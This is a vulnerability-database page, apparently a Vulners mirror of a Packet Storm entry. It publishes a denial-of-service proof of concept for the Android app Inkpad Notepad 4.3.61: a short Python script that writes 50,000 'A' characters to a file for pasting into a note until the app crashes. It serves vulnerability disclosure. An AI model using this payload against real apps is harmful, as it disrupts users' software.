Vulners
Lucene search
Inkpad Notepad And To Do List 4.3.61 Denial Of Service
🗓️ 04 Jun 2021 00:00:00Reported by Brian RodriguezType 
packetstorm🔗 packetstormsecurity.com👁 157 Views
`# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
# Date: 2021-06-03
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
# Version: 4.3.61
# Category: DoS (Android)
##### Vulnerability #####
InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 50000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4